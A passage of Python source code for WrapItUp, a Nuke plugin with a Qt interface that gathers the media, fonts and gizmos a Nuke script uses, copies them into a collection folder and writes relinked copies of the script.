self.ContinueOnError.setGeometry(QtCore.QRect(20, 20, 171, 17))
self.ContinueOnError.setChecked(True)
self.ContinueOnError.setTristate(False)
self.ContinueOnError.setObjectName("ContinueOnError")
self.ExitOnFinish = QtWidgets.QCheckBox(self.Misc)
self.ExitOnFinish.setGeometry(QtCore.QRect(20, 40, 171, 17))
self.ExitOnFinish.setChecked(False)
self.ExitOnFinish.setTristate(False)
self.ExitOnFinish.setObjectName("ExitOnFinish")
self.CSVSeparator = QtWidgets.QComboBox(self.Misc)
self.CSVSeparator.setGeometry(QtCore.QRect(460, 18, 41, 22))
self.CSVSeparator.setObjectName("CSVSeparator")
self.CSVSeparator.addItem("")
self.CSVSeparator.addItem("")
self.LCSVSeparator = QtWidgets.QLabel(self.Misc)
self.LCSVSeparator.setGeometry(QtCore.QRect(510, 18, 191, 21))
self.LCSVSeparator.setObjectName("LCSVSeparator")
self.License = QtWidgets.QComboBox(self.Misc)
self.License.setGeometry(QtCore.QRect(460, 38, 41, 22))
self.License.setObjectName("License")
self.License.addItem("")
self.License.addItem("")
self.LLicense = QtWidgets.QLabel(self.Misc)
self.LLicense.setGeometry(QtCore.QRect(510, 38, 191, 21))
self.LLicense.setObjectName("LLicense")
self.SettingPages.addTab(self.Misc, "")
self.GoToRootFolder = QtWidgets.QPushButton(Dialog)
self.GoToRootFolder.setGeometry(QtCore.QRect(810, 70, 75, 23))
self.GoToRootFolder.setAutoDefault(False)
self.GoToRootFolder.setObjectName("GoToRootFolder")
self.GoToNode = QtWidgets.QPushButton(Dialog)
self.GoToNode.setEnabled(False)
self.GoToNode.setGeometry(QtCore.QRect(100, 660, 75, 23))
self.GoToNode.setAutoDefault(False)
self.GoToNode.setObjectName("GoToNode")
self.ItemProgress.raise_()
self.ListCopyPaths.raise_()
self.ListIgnorePaths.raise_()
self.SendToIgnore.raise_()
self.SendToCopy.raise_()
self.PackedPath.raise_()
self.ChoosePackedPathButton.raise_()
self.LCopy.raise_()
self.LIgnore.raise_()
self.LCurrItemItemPath.raise_()
self.LPackedItemPath.raise_()
self.CurrItemPath.raise_()
self.PackedItemPath.raise_()
self.LWebsite.raise_()
self.LPath.raise_()
self.LFiles.raise_()
self.CurrItemFiles.raise_()
self.TotalProgress.raise_()
self.Refresh.raise_()
self.Start.raise_()
self.Interrupt.raise_()
self.LSize.raise_()
self.CurrItemSize.raise_()
self.LTotalCopySize.raise_()
self.TotalCopySize.raise_()
self.IgnoredLabel.raise_()
self.CurrentCopyItem.raise_()
self.GoToFolder.raise_()
self.SettingPages.raise_()
self.GoToRootFolder.raise_()
self.GoToNode.raise_()
self.retranslateUi(Dialog)
self.SettingPages.setCurrentIndex(0)
self.CSVSeparator.setCurrentIndex(0)
self.License.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "WrapItUp - Max van Leeuwen"))
self.ListCopyPaths.setToolTip(_translate("Dialog", "<html><head/><body><p>The found items that will be copied to the specified collection path.</p></body></html>"))
self.ListIgnorePaths.setToolTip(_translate("Dialog", "<html><head/><body><p>The found items that will not be copied to the specified collection path.</p></body></html>"))
self.SendToIgnore.setToolTip(_translate("Dialog", "Ignore selected items on the left."))
self.SendToIgnore.setText(_translate("Dialog", ">>"))
self.SendToCopy.setToolTip(_translate("Dialog", "Stop ignoring selected items on the right."))
self.SendToCopy.setText(_translate("Dialog", "<<"))
self.PackedPath.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.ChoosePackedPathButton.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.ChoosePackedPathButton.setText(_translate("Dialog", "folder"))
self.LCopy.setText(_translate("Dialog", "copy"))
self.LIgnore.setText(_translate("Dialog", "ignore"))
self.LCurrItemItemPath.setToolTip(_translate("Dialog", "Current path of the selected item."))
self.LCurrItemItemPath.setText(_translate("Dialog", "current item path"))
self.LPackedItemPath.setToolTip(_translate("Dialog", "<html><head/><body><p>Preview of the selected item\'s new path - after it is collected.</p></body></html>"))
self.LPackedItemPath.setText(_translate("Dialog", "packed item path"))
self.CurrItemPath.setText(_translate("Dialog", "-"))
self.PackedItemPath.setText(_translate("Dialog", "-"))
self.LWebsite.setToolTip(_translate("Dialog", "My website!"))
self.LWebsite.setText(_translate("Dialog", "<html><head/><body><p><a href=\"https://maxvanleeuwen.com/WrapItUp\"><span style=\" text-decoration: underline; color:#6bd5ff;\">maxvanleeuwen.com/WrapItUp</span></a></p></body></html>"))
self.LPath.setToolTip(_translate("Dialog", "<html><head/><body><p>The location of the folder to collect all data to.<br/>Make sure this is an empty folder.</p></body></html>"))
self.LPath.setText(_translate("Dialog", "collection folder:"))
self.LFiles.setToolTip(_translate("Dialog", "<html><head/><body><p>File/frame count of the selected item.</p></body></html>"))
self.LFiles.setText(_translate("Dialog", "files"))
self.CurrItemFiles.setText(_translate("Dialog", "-"))
self.TotalProgress.setToolTip(_translate("Dialog", "<html><head/><body><p>Total progress.</p></body></html>"))
self.Refresh.setToolTip(_translate("Dialog", "<html><head/><body><p>Recheck the current Nuke script for media and other files to collect.</p></body></html>"))
self.Refresh.setText(_translate("Dialog", "refresh"))
self.Start.setToolTip(_translate("Dialog", "<html><head/><body><p>Start with the current settings.<br/>One final confirmation will be shown.</p></body></html>"))
self.Start.setText(_translate("Dialog", "start..."))
self.Interrupt.setToolTip(_translate("Dialog", "<html><head/><body><p>Stop/exit.</p></body></html>"))
self.Interrupt.setText(_translate("Dialog", "interrupt"))
self.LSize.setToolTip(_translate("Dialog", "<html><head/><body><p>Size of the selected item.</p></body></html>"))
self.LSize.setText(_translate("Dialog", "size"))
self.CurrItemSize.setText(_translate("Dialog", "-"))
self.LTotalCopySize.setToolTip(_translate("Dialog", "Total size of all files to be copied."))
self.LTotalCopySize.setText(_translate("Dialog", "total size"))
self.TotalCopySize.setToolTip(_translate("Dialog", "Total size of all files to be copied."))
self.TotalCopySize.setText(_translate("Dialog", "0"))
self.IgnoredLabel.setText(_translate("Dialog", "ignored!"))
self.CurrentCopyItem.setText(_translate("Dialog", "item loading..."))
self.GoToFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Go to the folder of the currently selected item.<br/><br/>alt/option+shift+r</p></body></html>"))
self.GoToFolder.setText(_translate("Dialog", "open folder"))
self.GoToFolder.setShortcut(_translate("Dialog", "Alt+Shift+R"))
self.ItemProgress.setToolTip(_translate("Dialog", "<html><head/><body><p>Item progress.</p></body></html>"))
self.RelinkPaths.setToolTip(_translate("Dialog", "<html><head/><body><p>Make another copy of the Nuke script in which all nodes that have their media copied over will be relinked.</p></body></html>"))
self.RelinkPaths.setText(_translate("Dialog", "make nuke script copy, relinked"))
self.RelativeRelink.setToolTip(_translate("Dialog", "<html><head/><body><p>Make another copy of the Nuke script in which all nodes that have their media copied over will be relinked using the following path prefix: [python {nuke.script_directory()}]<br/><br/>This way, the nuke script will keep working, even if it has been moved to a different location/machine - as long as the media files are right next to it.</p></body></html>"))
self.RelativeRelink.setText(_translate("Dialog", "make nuke script copy, relative relinked"))
self.LParentDirectories.setToolTip(_translate("Dialog", "<html><head/><body><p>The amount of (empty) parent directories to copy over for each found media item.<br/><br/>For instance:<br/>An image sequence in /path/to/image/files/file_####.exr with a parent directory count of 3 will have the following destination in the final collected path:<br/><br/>../MEDIA/image/files/file_####.exr<br/><br/><br/>If the \'place media in folder with node name\' checkbox is unchecked, do not make this number too small.<br/>Fiiles with same-name parent directories might end up overwriting, or merging together.</p></body></html>"))
self.LParentDirectories.setText(_translate("Dialog", "parent directories"))
self.ParentDirectories.setToolTip(_translate("Dialog", "<html><head/><body><p>The amount of (empty) parent directories to copy over for each found media item.<br/><br/>For instance:<br/>An image sequence in /path/to/image/files/file_####.exr with a parent directory count of 3 will have the following destination in the final collected path:<br/><br/>../MEDIA/image/files/file_####.exr<br/><br/><br/>If the \'place media in folder with node name\' checkbox is unchecked, do not make this number too small.<br/>Fiiles with same-name parent directories might end up overwriting, or merging together.</p></body></html>"))
self.NodeNameFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Place all media items in a subfolder with its corresponding node as that folder\'s name.<br/><br/>This helps finding which media belonged to which node in the new comp, and it is an extra measure against the kind of problems that could arise when parent folders of different media items have the same names.</p></body></html>"))
self.NodeNameFolder.setText(_translate("Dialog", "place media in folder with node name"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.MainSettings), _translate("Dialog", "media"))
self.CopyFontDir.setToolTip(_translate("Dialog", "<html><head/><body><p>If the current Nuke script has a custom Project Font Path set in Settings > Node, collect this directory.</p></body></html>"))
self.CopyFontDir.setText(_translate("Dialog", "copy font directory (if any)"))
self.CopyGizmos.setToolTip(_translate("Dialog", "<html><head/><body><p>If custom gizmos are used in this Nuke script, collect them and generate an init.py and menu.py file that installs them on a different machine.<br/><br/>This function does not work for all gizmos, as they can be dependent on other files.<br/>This does not work for plugins (.dll, .so, .dylib).</p></body></html>"))
self.CopyGizmos.setText(_translate("Dialog", "copy gizmos"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.tab), _translate("Dialog", "add-ons"))
self.ContinueOnError.setToolTip(_translate("Dialog", "<html><head/><body><p>Continue copying if an error occurs.<br/>If there are errors, check the log.txt file generated in the selected root folder.</p></body></html>"))
self.ContinueOnError.setText(_translate("Dialog", "continue on error"))
self.ExitOnFinish.setToolTip(_translate("Dialog", "<html><head/><body><p>Close Nuke entirely when the copying process is finished (or on error, if \'continue on error\' is disabled).<br/><br/>Useful for machines that are licensed using a limited number of floating licenses on a license server.</p></body></html>"))
self.ExitOnFinish.setText(_translate("Dialog", "exit nuke on finish"))
self.CSVSeparator.setToolTip(_translate("Dialog", "<html><head/><body><p>Set the log file\'s CSV column separator.</p></body></html>"))
self.CSVSeparator.setItemText(0, _translate("Dialog", ";"))
self.CSVSeparator.setItemText(1, _translate("Dialog", ","))
self.LCSVSeparator.setToolTip(_translate("Dialog", "<html><head/><body><p>Set the log file\'s CSV column separator.</p></body></html>"))
self.LCSVSeparator.setText(_translate("Dialog", "CSV separator"))
self.SettingPages.setTabText(self.SettingPages.indexOf(self.Misc), _translate("Dialog", "misc"))
self.License.setToolTip(_translate("Dialog", "<html><head/><body><p>Use this flag internally when running Nuke in command-line (when relinking).<br/>The -t flag uses a nuke_r license, the -ti flag uses a nuke_i license.</p></body></html>"))
self.License.setItemText(0, _translate("Dialog", "-t"))
self.License.setItemText(1, _translate("Dialog", "-ti"))
self.LLicense.setToolTip(_translate("Dialog", "<html><head/><body><p>Use this flag internally when running Nuke in command-line (when relinking).<br/>The -t flag uses a nuke_r license, the -ti flag uses a nuke_i license.</p></body></html>"))
self.LLicense.setText(_translate("Dialog", "relink license"))
self.GoToRootFolder.setToolTip(_translate("Dialog", "<html><head/><body><p>Open the currently selected folder.</p></body></html>"))
self.GoToRootFolder.setText(_translate("Dialog", "open folder"))
self.GoToNode.setToolTip(_translate("Dialog", "<html><head/><body><p>Go to the folder of the currently selected item.<br/><br/>alt/option+shift+r</p></body></html>"))
self.GoToNode.setText(_translate("Dialog", "go to node"))
# END OF EMBEDDED UI
# import necessary
import sys
import nuke
import shutil
import threading
import os
import glob
import re
import subprocess
import webbrowser
import time
# globals
WIU_PackedPath = ''
WIU_Interrupted = False
WIU_TotalSize = 0
WIU_Copying = False
WIU_ProjectDir = False
WIU_Relink = True
WIU_RelinkRelative = True
WIU_Gizmo = True
WIU_Fonts = True
WIU_ParentDirCount = 3
WIU_NodeNameFolder = True
WIU_AppPath = ''
WIU_SilentReturn = []
WIU_SilentList = []
WIU_MediaDataNotIgnored = []
# bytes to readable string
def BytesToString(B):
B = float(B)
KB = float(1024)
MB = float(KB ** 2) # 1.048.576
GB = float(KB ** 3) # 1.073.741.824
TB = float(KB ** 4) # 1.099.511.627.776
if B < KB:
return '{0} {1}'.format(B, 'B')
elif KB <= B < MB:
return '{0:.2f} KB'.format(B/KB)
elif MB <= B < GB:
return '{0:.2f} MB'.format(B/MB)
elif GB <= B < TB:
return '{0:.2f} GB'.format(B/GB)
elif TB <= B:
return '{0:.2f} TB'.format(B/TB)
def evalTCL(text):
val = ''
try:
val = nuke.tcl("[return \"" + text + "\"]")
except Exception as e:
# TCL not working for this string
pass
# only allow string type to be returned
if type(val) is not str:
val = text
return val
def _Start(silent = False, nk = '', startnow = False, out = '', nodenamefolder = True, parentdircount = 3, relinked = True, relativerelinked = True, media = True, fonts = True, gizmos = True, csvcommas = False, licinteractive = False):
# reset list
global WIU_SilentList
WIU_SilentList = []
# add project directory to start of path (or get project dir path)
def ProjectDirectory(pth = ''):
# set global projectdir
global WIU_ProjectDir
WIU_ProjectDir = True
# get project directory
projectdir = nuke.root()['project_directory'].getValue()
# remove double slash
if projectdir.endswith('/') and pth.startswith('/'):
projectdir = projectdir[:-1]
# stitch together
pth = projectdir + pth
return pth
# returns all paths one file knob could refer to
def GetRealKnobPaths(knobPath):
# container for all found paths in sequence
paths = []
# all versions of knobPath (stereo views, %v)
viewFiles = []
# project directory relative path
projectdir = False
# check if stereo files are used
if r'%v' in knobPath or r'%V' in knobPath:
# get all stereo views in the comp
viewRtn = nuke.root().knob('views').toScript()
for rtn in viewRtn.split('\n'):
# get each view name in the nuke comp
view = rtn.split(' ')[-2]
# replace in path and append to viewfiles
viewFiles.append(knobPath.replace(r'%v', view).replace(r'%V', view))
# if not, do not replace anything
else:
viewFiles = [knobPath]
# overwrite knobPath value with new value per view
for knobPath in viewFiles:
# get TCL evaluated string
knobPathTCL = evalTCL(knobPath)
# get parent directory
knobPathParentDir = os.path.dirname(knobPathTCL)
# try appending project root folder, if the dir does not exist
if not os.path.exists(knobPathParentDir):
knobPath_projectdir = ProjectDirectory(knobPathParentDir)
if os.path.isdir(knobPath_projectdir):
projectdir = True
knobPathParentDir = knobPath_projectdir
knobPathTCL = ProjectDirectory(knobPathTCL)
# check if the parent dir exists
if os.path.exists(knobPathParentDir):
# if it does, get the filename
filename = knobPathTCL.split('/')[-1]
# get number from printf notation as int
printfCount = -1
try:
# regex pattern for printf notation (only get first result of found printf notations)
regex = re.compile('%..d')
regexFile = regex.findall(filename)[0]
printfCount = int(regexFile[1:-1])
except Exception as e:
# no printf used
pass
# if printf notation is used for the sequence
if printfCount > 0:
# make wildcard string (e.g. '????') for glob with same length as #
wildcards = ''
for i in range(printfCount):
wildcards += '?'
wildcardPath = knobPathTCL.replace(regexFile, wildcards)
# get all files in directory
files = glob.glob(wildcardPath)
for eachFile in files:
paths.append(eachFile.replace('\\', '/'))
# if hash notation is used for the sequence
elif '#' in filename:
# split by #
filenameSplit = filename.split('#')
# count amount of #
wildcardCount = len(filenameSplit) - 2
# make wildcard string (e.g. '????') for glob with same length as #
wildcards = ''
for i in range(wildcardCount + 1):
wildcards += '?'
# get full filename with wildcard replaced
filename = filenameSplit[ -len(filenameSplit) ] + wildcards + filenameSplit[ -1 ]
# full file path
wildcardPath = os.path.join(knobPathParentDir, filename).replace('\\', '/')
# get all files that match wildcard pattern
files = glob.glob(wildcardPath)
for eachFile in files:
paths.append(eachFile.replace('\\', '/'))
# if not a sequence
else:
# append this file to paths, if it exists
if os.path.isfile(knobPathTCL):
paths.append(knobPathTCL)
# check if it is a relative (project directory) path
elif os.path.isfile(ProjectDirectory(knobPathTCL)):
paths.append(ProjectDirectory(knobPathTCL))
# return result
return [paths, projectdir]
# function to shorten a path to where it can be appended to the chosen packed media directory path
def PackedPath(fullPath, i = 0, nodeName = '', fontFolder = '', project_dir = False, settingFontPath = False):
global WIU_NodeNameFolder
global WIU_ParentDirCount
# set node name folder to argument if the UI is not loaded
if silent:
WIU_NodeNameFolder = nodenamefolder
WIU_ParentDirCount = parentdircount
# TCL eval
fullPath = evalTCL(fullPath)
# media (default)
if i == 0:
# get amount of parent directories
parentDirCount = WIU_ParentDirCount
# split into parent dirs
splitPath = fullPath.split('/')
splitCleanPath = []
for s in splitPath:
if s is not '':
splitCleanPath.append(s)
# build shortened path (do not add / at the end of the path)
newPath = (nodeName + '/') if (WIU_NodeNameFolder and not project_dir) else ''
# make actual parent dir count equal to user-chosen parent dir count when it is higher, and when the current media is from project_dir
if parentDirCount > len(splitCleanPath) or project_dir:
parentDirCount = len(splitCleanPath)
for c in range(parentDirCount):
newPath += splitCleanPath[ len(splitCleanPath) - (parentDirCount - c) ] + ('/' if not c == parentDirCount - 1 else '')
if project_dir:
newPath = newPath.replace(ProjectDirectory(), '')
# sanitise string
illegalChars = ':<>$?!;\'\"\\`*|'
for c in illegalChars:
newPath = newPath.replace(c, '_')
subdir = 'MEDIA'
if project_dir:
subdir = 'PROJECT_DIRECTORY'
newPath = WIU_PackedPath + '/' + subdir + '/' + newPath
return newPath
fileName = fullPath.split('/')[-1]
# nuke script
if i == -1:
newPath = WIU_PackedPath + '/' + fullPath.split('/')[-1]
return newPath
# nuke script relinked
if i == -2:
newPath = WIU_PackedPath + '/' + os.path.splitext( fileName )[0] + '_RELINKED.nk'
return newPath
# nuke script relinked relative
if i == -3:
newPath = WIU_PackedPath + '/' + os.path.splitext( fileName )[0] + '_RELINKED-RELATIVE.nk'
return newPath
# font directory
if i == -4:
newPath = WIU_PackedPath + '/' + 'FONTS' + '/' + fontFolder.split('/')[-1] + ( ('/' + fullPath.split('/')[-1]) if not settingFontPath else '')
return newPath
# gizmo
if i <= -5:
newPath = WIU_PackedPath + '/' + 'GIZMOS/Collected' + '/' + os.path.splitext( fileName )[0] + '/' + fileName
return newPath
# gets all file knobs in the comp file and runs them through GetRealKnobPaths() - returns results
def ReadCompMediaData():
# progress bar total value
prTotal = len(nuke.allNodes(recurseGroups=True))
# container for all loaded files
readFiles = []
# collect all knobs with files in them
iNode = 0
for eachNode in nuke.allNodes(recurseGroups=True):
for eachKnob in eachNode.knobs():
currKnob = eachNode[eachKnob]
if currKnob.Class() == 'File_Knob':
# only add if a path has been entered
foundPath = currKnob.getValue()
if foundPath is not '':
# get real paths (file path list + project dir bool)
RealKnobPathsResult = GetRealKnobPaths(foundPath)
realKnobPaths = RealKnobPathsResult[0]
projectdir = RealKnobPathsResult[1]
# make new list for new paths with their per-file size included
allFilesWithSizes = []
# get total file size
totalSize = 0
for eachFile in realKnobPaths:
size = os.path.getsize(eachFile)
totalSize += size
allFilesWithSizes.append([eachFile, size])
# check if the path exists
exists = False
if len(realKnobPaths) > 0:
exists = True
# make media item (node(s), knob(s), file exists, knob value, all paths and sizes per item, total size, is relative from project directory)
mediaItem = [[eachNode], [eachKnob], exists, foundPath, allFilesWithSizes, totalSize, projectdir]
# check if the media item has already been found via another node
existingItem = -1
i = 0
for m in readFiles:
# remember item index (should happen once at most for each check, so overwriting the previous existingItem is not an issue)
if m[4] == mediaItem[4] and m[3] == mediaItem[3]:
existingItem = i
i += 1
# append node and knob to existing item instead of appending the new item
if existingItem is not -1:
readFiles[existingItem][0].append(eachNode)
readFiles[existingItem][1].append(eachKnob)
# item is new
else:
# append all data to final list
readFiles.append( mediaItem )
if not silent:
nuke.executeInMainThread(TotalProgressUpdate, args=(int(round( float(iNode) / float(prTotal) * 100 / 2 ))))
iNode += 1
# return results
return readFiles
# check if a node is a gizmo, and if so, return the full name
def isGizmo(n):
# compare type
gizmo = type(n) == nuke.Gizmo
# append .gizmo
gizmoName = n.Class() if n.Class().endswith('.gizmo') else n.Class() + '.gizmo'
# return
if gizmo:
return gizmoName
else:
return ''
# window to show when nuke should be saved first
def SaveNukeFirst():
nuke.message("Save the Nuke script first!")
window.close()
def ReadCompOtherData():
# total progress bar value
prTotal = len(nuke.allNodes(recurseGroups=True))
# all non-media data is collected here
readData = []
# get current nuke script location
NukeScript = ''
NukeScriptSize = 0
if not silent:
try:
NukeScript = nuke.root().name()
NukeScriptSize = os.path.getsize(NukeScript)
except Exception as e:
nuke.executeInMainThread(SaveNukeFirst, args=())
return False
else:
NukeScript = nk
NukeScriptSize = os.path.getsize(nk)
# item 0: nukescript
readData.append([NukeScript, NukeScriptSize])
# item 1: nukescript relinked
readData.append([NukeScript, NukeScriptSize])
# item 2: nukescript relative relinked
readData.append([NukeScript, NukeScriptSize])
# item 3: get the project font path
fontPathRaw = nuke.root()['free_type_font_path'].getValue()
fontPath = evalTCL(fontPathRaw)
totalSize = 0
# collection of all font files
fontPathsS = []
for path, subdirs, files in os.walk(fontPath):
for eachFile in files:
currFile = os.path.join(path, eachFile).replace('\\', '/')
currSize = os.path.getsize(currFile)
totalSize += currSize
fontPathsS.append([currFile, currSize])
# list with font path, total size of all files, list of font files + sizes
readData.append([fontPath, totalSize, fontPathsS])
# item 4: get all gizmos
gizmoList = []
# get each gizmo name as string
for eachNode in nuke.allNodes(recurseGroups=True):
# check if gizmo
gizmoName = isGizmo(eachNode)
# find gizmo items
if gizmoName is not '':
gizmoItem = [gizmoName, [eachNode]]
# check if the gizmo was already found earlier, and if so, append only the node to the already found gizmo item
i = 0
alreadyFound = False
for g in gizmoList:
if g[0] == gizmoName:
alreadyFound = True
gizmoList[i][1].append(eachNode)
i+=1
if not alreadyFound:
gizmoList.append( gizmoItem )
# iterate through plugin paths to search for them
iNode = 0
for eachPluginPath in nuke.pluginPath():
nodeI = 0
for eachGizmo in gizmoList:
gizmoPath = os.path.join(eachPluginPath, eachGizmo[0]).replace('\\', '/')
if os.path.isfile(gizmoPath):
# list item: path to gizmo file, size of gizmo file, list of all nodes using the gizmo
readData.append( [gizmoPath, os.path.getsize(gizmoPath), eachGizmo[1]] )
nodeI += 1
if not silent:
nuke.executeInMainThread(TotalProgressUpdate, args=(int(float(iNode) / float(prTotal) * 100) + 50))
iNode += 1
return readData
# function that copies files on all platforms, and creates intermediate directories if needed
# it has some file-specific actions (writing the custom init.py file for copied gizmos, and relinking the nuke scripts)
def ProcessFile(fileFrom, fileTo, writeInit, firstInit, relinkMethod, relinkFonts):
global WIU_MediaDataNotIgnored
# caught errors to return
err = ''
try:
# create intermediate folders
ToParentFolder = os.path.dirname(fileTo)
if not os.path.isdir(ToParentFolder):
os.makedirs( ToParentFolder )
# copy file
shutil.copy2(fileFrom, fileTo)
# update init.py/menu.py file
if writeInit:
# write menu.py/init.py file - file path, is in root path (bool)
def WriteFile(fileName, root):
# which file
filePath = WIU_PackedPath + '/GIZMOS/' + ('Collected/' if not root else '') + fileName + '.py'
# try to remove it if logging just started
if firstInit:
try:
os.remove(filePath)
except Exception as e:
pass
# open file
f = open(filePath, "a+")
strText = ''
if firstInit:
strText += '# Generated by ' + WIU_Title
if root:
strText += '\n#\n# Place all contents of the /GIZMOS folder in your /user/.nuke directory to install the necessary gizmos for the collected Nuke script.\n# If an init.py file already exists in /users/.nuke, simply append the following line to that file (instead of overwriting it with this one):\n\n'
strText += "\nnuke.pluginAddPath(\'./Collected\')"
else:
strText += '\n\n'
if not root:
if fileName == 'init':
gizmoFolderName = fileTo.split('/')[-2]
strText += '\nnuke.pluginAddPath(\"./' + gizmoFolderName + "\")"
elif fileName == 'menu':
gizmoFolderName = fileTo.split('/')[-2]
strText += "\nnuke.toolbar(\"Nodes\").addCommand(\"Collected/" + gizmoFolderName + "\", \"nuke.createNode('" + gizmoFolderName + ".gizmo')\")"
# write and close
f.write(strText)
f.close()
# write GIZMOS/init.py
if firstInit:
WriteFile('init', True)
# GIZMOS/Collected/init.py
WriteFile('init', False)
#GIZMOS/Collected/menu.py
WriteFile('menu', False)
# relink nuke script
if relinkMethod is not -1:
if silent:
print('\n' + WIU_Log + 'Opening temporary Nuke comp in terminal to relink' + (' (relative)' if relinkMethod == 1 else ''))
# quotation mark
q = '\"'
# temp terminal file
filePath = WIU_PackedPath + '/WrapItUp_Temp-RELINK_' + str(relinkMethod) + '.py'
# get nk path
scriptpath = PackedPath(WIU_OtherData[0][0], i= -2 - relinkMethod)
# prepare list of things to do (node name, knob name, new value)
vList = []
# fonts (if needed)
if relinkFonts and fonts:
vList.append([ 'root', 'free_type_font_path', PackedPath(WIU_OtherData[3][0], i=-4, fontFolder=WIU_OtherData[3][0], settingFontPath=True) ]) #font path
# project directory (if needed)
if WIU_ProjectDir:
vList.append([ 'root', 'project_directory', PackedPath('', project_dir = True) ]) #new project directory
# for all media
if media:
for d in WIU_MediaData:
# all knobs should be relinked
n = 0
for eachNode in d[0]:
# do not relink files that aren't copied, or when in project directory
if (silent or (d in WIU_MediaDataNotIgnored)) and not d[6]:
vList.append([eachNode.fullName(), d[1][n], PackedPath( d[3], nodeName=getNodeNames(d[0], us=True), project_dir = d[6] )])
n += 1
# write to pyText
pyText = '# Generated by ' + WIU_Title + '\n#\n# This is a temporary file used to relink nuke scripts. It can be removed.\n\n'
pyText += 'nuke.scriptOpen(' + q + scriptpath + q + ')\n'
for v in vList:
# replace path for relinked relative
if relinkMethod == 1:
v[2] = v[2].replace(os.path.dirname(scriptpath), '[python {nuke.script_directory()}]')
pyText += '\n'
pyText += 'n = nuke.toNode(' + q + v[0] + q + ')\n'
pyText += 'n[' + q + v[1] + q + '].setValue(' + q + v[2] + q + ')\n'
pyText += '\nnuke.scriptSave(' + q + scriptpath + q + ')'
try:
# make py file
f = open(filePath, "w+")
# write
f.write(pyText)
# close
f.close()
license = getLic()
args = [WIU_AppPath, license, '-q', filePath]
subprocess.call(args)
# remove the remporary terminal file
try:
os.remove(filePath)
except Exception as e1:
err += 'Could not remove temporary file for relinking: ' + filePath + '\n' + str(e1) + '\n\n'
# try to remove the autosave file
try:
os.remove(scriptpath + '~')
except Exception as e4:
pass
except Exception as e2:
err += 'Could not write/execute temporary file for relinking: ' + filePath + '\n' + str(e2) + '\n\n'
if silent:
print(WIU_Log + 'End of Nuke block' + '\n')
return err
except Exception as e3:
return str(e3)
# read comp
def Refresh():
window.setEnabled(False)
WTotalProgress.setVisible(True)
threading.Thread(target=RefreshThreaded, args=()).start()
# threaded refresh
def RefreshThreaded():
global WIU_MediaData
global WIU_OtherData
# get all paths and information from the current comp
WIU_MediaData = ReadCompMediaData()
WIU_OtherData = ReadCompOtherData()
# if silent, update ui
if not silent:
nuke.executeInMainThread(RefreshUI, args=())
# if not, return all data for silent mode
else:
refreshRtn = RefreshUI()
return refreshRtn
# apply read data to WrapItUp window
def RefreshUI():
global WIU_MediaData
global WIU_OtherData
global WIU_SilentReturn
global WIU_SilentList
# if silent, return this list
WIU_SilentReturn = []
if not silent:
# clear list
WListCopyPaths.clear()
WListIgnorePaths.clear()
# close if comp has not been saved
if not WIU_OtherData:
return
# list count
iCopy = 0
item = "nk\t\t" + WIU_OtherData[0][0].split('/')[-1] if not silent else "nk\t\t\t\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
# add current nuke script to copy list
WListCopyPaths.addItem(item)
WListCopyPaths.item(iCopy).setData(QtCore.Qt.UserRole, -1)
WListCopyPaths.item(iCopy).setForeground(QtGui.QColor(150, 150, 150))
iCopy += 1
else:
WIU_SilentList.append([item, -1])
WIU_SilentReturn.append(item)
iCopy += RelinksInList()
iCopy += AddOnsInList()
# go through each found fileknob value
iIgnore = 0
i = 0
for dataItem in WIU_MediaData:
# check if the path exists
existsBool = dataItem[2]
exists = '' if existsBool else 'MISSING: '
# make an item for the list
nodeName = getNodeNames(dataItem[0])
extraTab = '\t' if len(nodeName) < 13 else ''
item = exists + nodeName + '\t' + extraTab + dataItem[3] if not silent else exists + nodeName + '\t\t' + extraTab + dataItem[3]
if not silent:
# add to the right list
if(existsBool):
# add item
WListCopyPaths.addItem(item)
# add data to item
WListCopyPaths.item(iCopy).setData(QtCore.Qt.UserRole, i)
# count
iCopy += 1
else:
# add item
WListIgnorePaths.addItem(item)
# add data to item
WListIgnorePaths.item(iIgnore).setData(QtCore.Qt.UserRole, i)
# grayed out colours
WListIgnorePaths.item(iIgnore).setForeground(QtGui.QColor(150, 150, 150))
# count
iIgnore += 1
else:
if existsBool:
WIU_SilentList.append([item, i])
WIU_SilentReturn.append(item)
# overall count
i += 1
if not silent:
UpdateTotalSize()
WTotalProgress.setVisible(False)
window.setEnabled(True)
else:
UpdateTotalSize()
if startnow:
StartCopyRtn = StartCopy()
return StartCopyRtn
else:
return WIU_SilentReturn
# move item from copy to ignore
def SendToIgnore():
for eachSelectedItem in WListCopyPaths.selectedItems():
# only copy over if allowed
selI = eachSelectedItem.data(QtCore.Qt.UserRole)
if selI >= 0:
WListCopyPaths.takeItem(WListCopyPaths.row(eachSelectedItem))
WListIgnorePaths.addItem(eachSelectedItem)
UpdateTotalSize()
# move item from ignore to copy
def SendToCopy():
for eachSelectedItem in WListIgnorePaths.selectedItems():
# get data
selI = eachSelectedItem.data(QtCore.Qt.UserRole)
selData = WIU_MediaData[selI]
selExists = selData[2]
# only copy over if it exists
if selExists:
WListIgnorePaths.takeItem(WListIgnorePaths.row(eachSelectedItem))
WListCopyPaths.addItem(eachSelectedItem)
UpdateTotalSize()
# update total file size count
def UpdateTotalSize():
global WIU_TotalSize
# add up all data from each item in the copy list
WIU_TotalSize = 0
itemLen = WListCopyPaths.count() if not silent else len(WIU_SilentList)
for i in range(itemLen):
itemData = WListCopyPaths.item(i).data(QtCore.Qt.UserRole) if not silent else WIU_SilentList[i][1]
Media = False
if itemData >= 0:
Media = True
if Media:
for eachFile in WIU_MediaData[itemData][4]:
WIU_TotalSize += eachFile[1]
else:
WIU_TotalSize += WIU_OtherData[abs(itemData)-1][1]
# set label
if not silent:
WTotalCopySize.setText( BytesToString(WIU_TotalSize) )
# selection hanged on copy list
def CopyListSelectionChanged():
WListIgnorePaths.clearSelection()
UpdateLabels(True)
# selection hanged on ignore list
def IgnoreListSelectionChanged():
WListCopyPaths.clearSelection()
